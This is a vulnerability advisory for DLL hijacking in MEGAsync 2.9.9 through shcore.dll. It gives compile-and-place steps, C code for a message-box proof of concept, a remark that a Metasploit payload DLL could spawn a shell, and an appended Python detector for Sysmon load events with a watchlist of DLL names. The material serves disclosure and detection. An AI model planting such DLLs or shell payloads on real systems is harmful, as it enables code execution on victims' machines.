MEGAsync 2.9.9 DLL Hijacking
Posted on 30 August 2016
# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://mega.nz
# Software Link: https://mega.nz/MEGAsyncSetup.exe
# Version: 2.9.9
# Tested on: Windows 7
----------------------------------------------------------------------------------------------------------
Vuln DLL: shcore.dll

MEGAsync.exe will search for and load any DLL named "shcore.dll".
If an attacker can place the DLL in a location from which the victim opens MEGAsync.exe,
it will load and run the attacker's DLL and code.
An attacker can also generate a msfpayload DLL and spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile the C code below as 'shcore.dll' to create the vuln DLL
2- Place 'shcore.dll' in the same directory as MEGAsync
3- Open MEGAsync.exe

DLL:

//gcc test.c -o shcore.dll -shared
//this DLL shows a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

// Declared before DllMain so the call below compiles without an implicit declaration
int dll_hijack(void);

BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack(void)
{
  MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}
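For detection, the load described above shows up in Sysmon Event ID 7 (ImageLoad) as a watched DLL name loaded from outside the Windows system directories. The following is an added example, not part of the original advisory: the event records, user name, install path, `helper.dll` and the watchlist entries other than `shcore.dll` are constructed assumptions.

```python
import ntpath

# Directories Windows system DLLs are normally loaded from (assumed default install).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# Watchlist of DLL names; "shcore.dll" is the one named in the advisory, the
# others are illustrative. In practice, build it from a clean host's System32.
WATCHED_DLLS = {"shcore.dll", "version.dll", "dwmapi.dll"}

# Constructed Sysmon Event ID 7 (ImageLoad) records; paths and user are made up.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\SHCore.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\MEGAsync\MEGAsync.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\MEGAsync\shcore.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\MEGAsync\MEGAsync.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\MEGAsync\helper.dll", "Signed": "true"},
]


def is_trusted_path(path):
    """True if path, after resolving '..' segments, lies under a trusted directory."""
    p = ntpath.normpath(path).lower()
    return any(p.startswith(d + "\\") for d in TRUSTED_DIRS)


def find_shadowed_loads(events):
    """Return loads of watched DLL names from outside the trusted directories."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        loaded = ev["ImageLoaded"]
        if ntpath.basename(loaded).lower() not in WATCHED_DLLS or is_trusted_path(loaded):
            continue
        hits.append({
            "process": ev["Image"],
            "dll": loaded,
            "signed": ev.get("Signed") == "true",
            # Same folder as the executable is the placement the advisory describes.
            "beside_exe": ntpath.dirname(loaded).lower() == ntpath.dirname(ev["Image"]).lower(),
        })
    return hits


if __name__ == "__main__":
    for hit in find_shadowed_loads(SAMPLE_EVENTS):
        print(hit)
```

An unsigned hit with `beside_exe` set is the highest-priority case to triage.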